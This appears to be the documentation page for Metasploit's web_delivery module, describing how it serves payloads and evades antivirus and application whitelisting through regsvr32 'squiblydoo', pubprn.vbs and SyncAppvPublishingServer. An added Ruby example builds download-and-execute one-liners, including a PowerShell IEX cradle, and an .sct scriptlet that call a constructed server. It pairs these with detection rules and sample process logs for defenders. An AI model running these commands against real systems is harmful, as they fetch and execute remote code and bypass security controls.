module
Script Web Delivery
Disclosed | Created
---|---
07/19/2013 | 05/30/2018
Description
This module quickly fires up a web server that serves a payload.
The module will provide a command to be run on the target machine
based on the selected target. The provided command downloads
and executes a payload using either a specified scripting language
interpreter or the "squiblydoo" technique via regsvr32.exe, which
bypasses application whitelisting.
The main purpose of this module is to quickly establish a session on a
target machine when the attacker has to manually type in the command,
e.g. via command injection, an RDP session, local access, or remote
command execution.
With the interpreter-based targets the payload runs in memory and is
not written to disk, so it is less likely to trigger AV solutions, and
the resulting session supports the privilege escalation modules supplied
by Meterpreter.
When using either of the PSH targets, ensure the payload architecture
matches the target computer, or use the SysWOW64 powershell.exe to
execute x86 payloads on x64 machines.
The Regsvr32 target uses the "squiblydoo" technique to bypass application
whitelisting: the signed Microsoft binary regsvr32.exe requests an .sct
scriptlet file from the module's web server and executes the PowerShell
command embedded in it.
Similarly, the pubprn target uses the pubprn.vbs script to request and
execute an .sct file.
Both web requests (i.e., the .sct file and the PowerShell download/execute)
can be served on the same port.
The SyncAppvPublishingServer target uses the Microsoft-signed
SyncAppvPublishingServer.exe binary to request and execute a PowerShell
script. This technique only works on Windows 10 builds.
"PSH (Binary)" is the exception to the in-memory behaviour: it writes a
file to disk, allowing custom binaries to be served up to be downloaded
and executed.
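As an added example, not code from the module or from this page, the Ruby below shows the shape of the one-liner each target hands back, the squiblydoo .sct scriptlet that regsvr32.exe fetches and runs, and a small detector run over constructed process-creation log lines so the same artefacts can be recognised from the defender's side. The server address, URI paths, CLSID and log lines are constructed for illustration, and the command strings are approximations of what the module emits, not copies of its output.

```ruby
# Constructed illustration of the web_delivery command shapes and a detector
# for them. Nothing here is the module's own code; host, paths and CLSID
# are assumptions chosen for the example.
SERVER   = 'http://192.0.2.10:8080'  # constructed TEST-NET-1 address
SCT_PATH = '/jxk9.sct'               # assumed URI of the served scriptlet
PS1_PATH = '/jxk9'                   # assumed URI of the served PowerShell

# PowerShell download cradle: fetch the served script and run it in memory,
# so nothing lands on disk (the page's "does not write to disk" claim).
def psh_cradle(base, path)
  "IEX ((new-object net.webclient).downloadstring('#{base}#{path}'))"
end

# Minimal squiblydoo scriptlet. regsvr32 /i:<url> scrobj.dll fetches this XML
# and evaluates the JScript inside <registration>, which launches the cradle.
# The progid/classid values are placeholders, not anything the module uses.
def build_sct(base, path)
  cmd = "powershell.exe -nop -w hidden -c \"#{psh_cradle(base, path)}\""
  <<~SCT
    <?XML version="1.0"?>
    <scriptlet>
    <registration progid="Example" classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
    <![CDATA[
    new ActiveXObject("WScript.Shell").Run(#{cmd.inspect}, 0, false);
    ]]>
    </script>
    </registration>
    </scriptlet>
  SCT
end

# Approximate one-liner per target. Both the .sct and the PowerShell fetch
# go to the same server and port, as the page notes.
def commands(base)
  {
    'PSH'      => "powershell.exe -nop -w hidden -c \"#{psh_cradle(base, PS1_PATH)}\"",
    'Regsvr32' => "regsvr32 /s /n /u /i:#{base}#{SCT_PATH} scrobj.dll",
    'pubprn'   => "cscript /nologo \"C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs\" 127.0.0.1 script:#{base}#{SCT_PATH}",
    'SyncAppvPublishingServer' => "SyncAppvPublishingServer.exe \"n;#{psh_cradle(base, PS1_PATH)}\"",
  }
end

# Detection rules keyed on the command-line traits each target cannot avoid:
# a remote /i: URL with scrobj.dll, a script: moniker passed to pubprn.vbs,
# the "n;" prefix SyncAppvPublishingServer needs, and a download cradle.
RULES = {
  'regsvr32 remote scriptlet (squiblydoo)' => /regsvr32(\.exe)?\b.*\/i:https?:\/\/.*scrobj\.dll/i,
  'pubprn.vbs script: moniker'             => /pubprn\.vbs.*\bscript:https?:\/\//i,
  'SyncAppvPublishingServer PowerShell'    => /SyncAppvPublishingServer(\.exe)?\s+"?n;/i,
  'PowerShell download cradle'             => /powershell.*(downloadstring|downloadfile|invoke-webrequest|iwr\b).*https?:\/\//i,
}.freeze

# Names of every rule that fires on one process command line.
def detect(cmdline)
  RULES.select { |_, re| cmdline.match?(re) }.keys
end

# Constructed Sysmon-style process-creation lines; two are benign controls.
SAMPLE_LOG = [
  'CommandLine: regsvr32 /s /n /u /i:http://192.0.2.10:8080/jxk9.sct scrobj.dll',
  'CommandLine: regsvr32 /s C:\Windows\System32\msxml3.dll',
  'CommandLine: cscript /nologo "C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs" 127.0.0.1 script:http://192.0.2.10:8080/jxk9.sct',
  'CommandLine: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.0.2.10:8080/jxk9\'))"',
  'CommandLine: powershell.exe -File C:\scripts\backup.ps1',
  'CommandLine: SyncAppvPublishingServer.exe "n;IEX ((new-object net.webclient).downloadstring(\'http://192.0.2.10:8080/jxk9\'))"',
].freeze

# Map each flagged command line to the rules it tripped; benign lines drop out.
def scan(lines)
  lines.each_with_object({}) do |line, hits|
    cmd = line.sub(/\ACommandLine:\s*/, '')
    names = detect(cmd)
    hits[cmd] = names unless names.empty?
  end
end

if __FILE__ == $PROGRAM_NAME
  commands(SERVER).each { |target, cmd| puts "#{target}: #{cmd}" }
  puts build_sct(SERVER, PS1_PATH)
  scan(SAMPLE_LOG).each { |cmd, names| puts "FLAGGED #{names.join(', ')}: #{cmd}" }
end
```

The detector deliberately keys on the LOLBin argument shapes rather than on the PowerShell text, because the squiblydoo and pubprn paths never show "powershell" on the parent command line; the cradle only appears in the child process spawned from the scriptlet.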
Authors
Andrew Smith "jakx", Ben Campbell, Chris Campbell, Casey Smith, Trenton Ivey, g0tmi1k, bcoles, Matt Nelson, phra, Nick Landers
Platform
Linux, OSX, PHP, Python, Windows
Module Options
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > show actions
    ...actions...
msf exploit(multi/script/web_delivery) > set ACTION <action-name>
msf exploit(multi/script/web_delivery) > show options
    ...show and set options...
msf exploit(multi/script/web_delivery) > run